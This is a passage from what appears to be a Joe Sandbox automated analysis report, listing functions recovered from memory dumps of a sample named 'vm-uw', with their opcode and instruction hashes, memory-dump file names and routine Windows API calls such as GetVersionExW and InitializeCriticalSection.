                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID:
                          • String ID: 8
                          • API String ID: 0-4194326291
                          • Opcode ID: d045308f99ed72c687752019a63fa7285d8222023fb615843d1027c19810a88c
                          • Instruction ID: 06298e0cb0f236749da481e85722f4b4d68132d40f542be5c0d0f63c6668add3
                          • Opcode Fuzzy Hash: d045308f99ed72c687752019a63fa7285d8222023fb615843d1027c19810a88c
                          • Instruction Fuzzy Hash: 6F421D71A1021A9FCF14DFA8C581AEDB7B5FF48310F154569E81AA7382DB30AE65CF90
                          APIs
                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0022B6B7,?,?,00000008,?,?,0022B357,00000000), ref: 0022B8E9
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: ExceptionRaise
                          • String ID:
                          • API String ID: 3997070919-0
                          • Opcode ID: de7032d0a5c1785d599c29aef52ccc04acb6f75f1ad05bcdbf8c3f8e52864d83
                          • Instruction ID: a9b5d2be06ccec3d7b41628a9737c1a7e0866f37ece911eb1d737686562e66a1
                          • Opcode Fuzzy Hash: de7032d0a5c1785d599c29aef52ccc04acb6f75f1ad05bcdbf8c3f8e52864d83
                          • Instruction Fuzzy Hash: D7B1AD32520619AFD716CF68D48AB647BE0FF45364F298658E9D9CF2A1C335E9A1CF00
                          APIs
                          • GetVersionExW.KERNEL32(?), ref: 00218BA3
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: Version
                          • String ID:
                          • API String ID: 1889659487-0
                          • Opcode ID: 1a9b47571a619aa8995a355985270e72f1dda25a3437d4c87b18a12d8aab7888
                          • Instruction ID: 8cec434ab071c5bcccb67f50860984411546a6ea521bcf6534c41a8fd824a1bb
                          • Opcode Fuzzy Hash: 1a9b47571a619aa8995a355985270e72f1dda25a3437d4c87b18a12d8aab7888
                          • Instruction Fuzzy Hash: 3151F672B101344BE71C8F2D9CD91E9BBE5EBC9342F44027ED59AD7290DA78C946CBA0
                          APIs
                          • SetUnhandledExceptionFilter.KERNEL32(Function_0003BD1A,0021B568), ref: 0021BD13
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: ExceptionFilterUnhandled
                          • String ID:
                          • API String ID: 3192549508-0
                          • Opcode ID: f0e580b20cebb3f08df1f6b606f81504d3db7d136135cd345c5ae16d1892a7ea
                          • Instruction ID: cf08348445d820732b039ea10f457df4a1d45404bfc8a07225b50f88665ce881
                          • Opcode Fuzzy Hash: f0e580b20cebb3f08df1f6b606f81504d3db7d136135cd345c5ae16d1892a7ea
                          • Instruction Fuzzy Hash:
                          APIs
                          • InitializeCriticalSection.KERNEL32(00000000), ref: 001E1D12
                            • Part of subcall function 001F6800: InitializeCriticalSection.KERNEL32(00000000), ref: 001F6864
                            • Part of subcall function 0021B473: __onexit.LIBCMT ref: 0021B479
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: CriticalInitializeSection$__onexit
                          • String ID:
                          • API String ID: 3584673837-0
                          • Opcode ID: b70dba2452dd22d6bdcd885f0acdbf6a87ca7b7e09765f843e740c54f96ea93a
                          • Instruction ID: 3ddce9d01ae83f85ddf561697bd0b733e99521977844933ee50ca9900ff903ce
                          • Opcode Fuzzy Hash: b70dba2452dd22d6bdcd885f0acdbf6a87ca7b7e09765f843e740c54f96ea93a
                          • Instruction Fuzzy Hash: A2F0BEF1D44248FBDB00DFA4ED06B59B7B8EB06B20F00823AE819837C0EB3556108A51
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID: HeapProcess
                          • String ID:
                          • API String ID: 54951025-0
                          • Opcode ID: 80be1edf7f910ae388c43c92875dd2774a47c9379a8753101506d42f4cc7b7cc
                          • Instruction ID: cdb56a7d6771a0b462dcf215ee3fbc0e25ea257a8a0678d9cf9459032e0e39d5
                          • Opcode Fuzzy Hash: 80be1edf7f910ae388c43c92875dd2774a47c9379a8753101506d42f4cc7b7cc
                          • Instruction Fuzzy Hash: E5A01138200200CB8B088F32BA0E30A3AE8AA022A03008028A000C0220EA208882AF20
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f179cb409cf02234172b593d2217f4742f0fc00fa86edd9d4aab02c0e88e5bab
                          • Instruction ID: 8b18b70c75ae4695f4c426dcf589d26904f71bc63e088979fc40a56c42f90e5b
                          • Opcode Fuzzy Hash: f179cb409cf02234172b593d2217f4742f0fc00fa86edd9d4aab02c0e88e5bab
                          • Instruction Fuzzy Hash: 80422570E106859FDB14DFA9CC85AAEB7F5FF84304F204628E426DB391E731AA55CB90
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 220785ddd8b393da2549bd6239c4d777406d83b12d219ea2de6630fe25a2e370
                          • Instruction ID: 29c8d0021fc8787c8dc718b8f704faf0cfeb384b731bbf099ad4143e39964902
                          • Opcode Fuzzy Hash: 220785ddd8b393da2549bd6239c4d777406d83b12d219ea2de6630fe25a2e370
                          • Instruction Fuzzy Hash: 00322421D39F615DD7239634E826339A248AFB73C8F65D737E81AB5AA5EF28C4934100
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d9e1dffb9c167f2a1bfd412aa57ca9546c7a865265bd6293c312d3add4af8ce4
                          • Instruction ID: fe945c64082993e108c6c8c1c8513cced06069601b4e1d932c7d0e942c3ed9d9
                          • Opcode Fuzzy Hash: d9e1dffb9c167f2a1bfd412aa57ca9546c7a865265bd6293c312d3add4af8ce4
                          • Instruction Fuzzy Hash: 442264335417044BE318CF2FCC81582B3E3AFD822475F857EC926CB696EEB9A61B4548
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a445ae59f0f07951cd6b0a1a51ee9bacf7365d4a2072ba4f6b3519b7a6c8537b
                          • Instruction ID: 8894e1b2b3304a910de56a6bb1f1df5d10dcf0db9f70aa3a7100f91a6e3207f7
                          • Opcode Fuzzy Hash: a445ae59f0f07951cd6b0a1a51ee9bacf7365d4a2072ba4f6b3519b7a6c8537b
                          • Instruction Fuzzy Hash: 0E129372E206258FDF14CE7CC9C06ECBBF5EB98341F1145B9E896E7240E6709A91CB94
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a996c3fecaed3b40f251943e28b6049b6459d809a98a49b13dc3435ca97b67a8
                          • Instruction ID: c56b0a4e682cf8c4b7868c62113324d6dae358e4cb26b789b31b734456091312
                          • Opcode Fuzzy Hash: a996c3fecaed3b40f251943e28b6049b6459d809a98a49b13dc3435ca97b67a8
                          • Instruction Fuzzy Hash: 41D131749200689FD708CF6DE8A587DB7F0FB4A302785419EE686D7392C738E615DBA0
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: eabff313b10b90b5c5c9539a71f10951af28c738a580b5d111c791043d6269c9
                          • Instruction ID: 3e0aeb387f50783ba6d05c82af7591a21523bf29cb21492c71631adb183f45f2
                          • Opcode Fuzzy Hash: eabff313b10b90b5c5c9539a71f10951af28c738a580b5d111c791043d6269c9
                          • Instruction Fuzzy Hash: 96C1A231A217398FDB24DF28D8847AEB7B5EF48300F5145E9D84AA7282D774AE91CF50
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6464b0a1f92fae0483d97a89116530c1adfccb4bd26ec0c66c96c4f6d954b020
                          • Instruction ID: 1ac0915f648e6fbf9664754925339ca291b585b09d7ec124906c638827a717e8
                          • Opcode Fuzzy Hash: 6464b0a1f92fae0483d97a89116530c1adfccb4bd26ec0c66c96c4f6d954b020
                          • Instruction Fuzzy Hash: 6861863263070F66CBB48E686B95BFE23D4AF31300F14043AEC62CB292D6519DF29791
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e55467ff69fc990d924ef8f0dcece3123bea78ad4fbafe1850c629ef42bcc2d3
                          • Instruction ID: 83e50be0ef2cec357951fd3533584bf9fec7e7a1a2afc41de73b0b1ed347f112
                          • Opcode Fuzzy Hash: e55467ff69fc990d924ef8f0dcece3123bea78ad4fbafe1850c629ef42bcc2d3
                          • Instruction Fuzzy Hash: 9E619D789142568FCB14CF6CC4809ADFBF1FF99300B19829DD885EB351E635AD82CBA4
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: db8a845b5d399e9ea96f1f6de174d1de5c3e1dcbb5d88029b34ccc4f98f28935
                          • Instruction ID: 67324edb02ebf1a5a8cc0e2fe45c55d826727425c9eefc4266435a68d77db205
                          • Opcode Fuzzy Hash: db8a845b5d399e9ea96f1f6de174d1de5c3e1dcbb5d88029b34ccc4f98f28935
                          • Instruction Fuzzy Hash: 9B414CB7B20904479B5CC529ECB623D3293EBCA311BC5D23EDB0F86295D73E48508217
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: cf026345308e1978ce5d0254964706abc4194266ca72681d6dcb911615d6cb78
                          • Instruction ID: e57340ad41ea13c9d7052a7619092241b6c5d67b92d20b61acfe602954bce00c
                          • Opcode Fuzzy Hash: cf026345308e1978ce5d0254964706abc4194266ca72681d6dcb911615d6cb78
                          • Instruction Fuzzy Hash: 25312532F2C4665FCB11CE6C88802A8FBF2ABE5358715C665D8A5D7240D770EEA1C3D0
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b5af437fc38d01459a44d5f6f12d05c2381e7f16825441c3b1c4813ef3ca91b9
                          • Instruction ID: f2ec2b224f58ddc27674faca4b4c52e87951eeafe96511c799cfed1229881690
                          • Opcode Fuzzy Hash: b5af437fc38d01459a44d5f6f12d05c2381e7f16825441c3b1c4813ef3ca91b9
                          • Instruction Fuzzy Hash: 3731D2717243065BD610DF29D8427ABB3D6FFD9310F044A1DF89997180EB21ED558A92
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: eff2c197b14432675c610be2a8a7a96fcb44c2ebb1baa81610379e931af77a57
                          • Instruction ID: 0079571e17d81f5667f6d9cadc82485fafbabee14af98ee874776ee0e1f0a2cf
                          • Opcode Fuzzy Hash: eff2c197b14432675c610be2a8a7a96fcb44c2ebb1baa81610379e931af77a57
                          • Instruction Fuzzy Hash: 3B312871A100745BCB08CF1DC8904BDBFE5EBA510134882ABECD6DB245D634CA82C7A0
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116304232.0000000000247000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.0000000000249000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116321006.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116355469.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1e0000_vm-uw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1ea83334c1e98586e875d0820215f4ccb4d4763d89a5a125069a5872052cfc15
                          • Instruction ID: edf95ae2514e868e58a050c022e99416684164bf70df39a36b11e256b3ac618a
                          • Opcode Fuzzy Hash: 1ea83334c1e98586e875d0820215f4ccb4d4763d89a5a125069a5872052cfc15
                          • Instruction Fuzzy Hash: 2F21F9735209365BC702DF5DF488677B3E1FFD5319FA78A26D98187180C624E824D690
                          Memory Dump Source
                          • Source File: 00000000.00000002.2116216410.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                          • Associated: 00000000.00000002.2116197258.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116254657.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2116280500.0000000000246000.00000004.00000001.01000000.00000003.sdmpDownload File
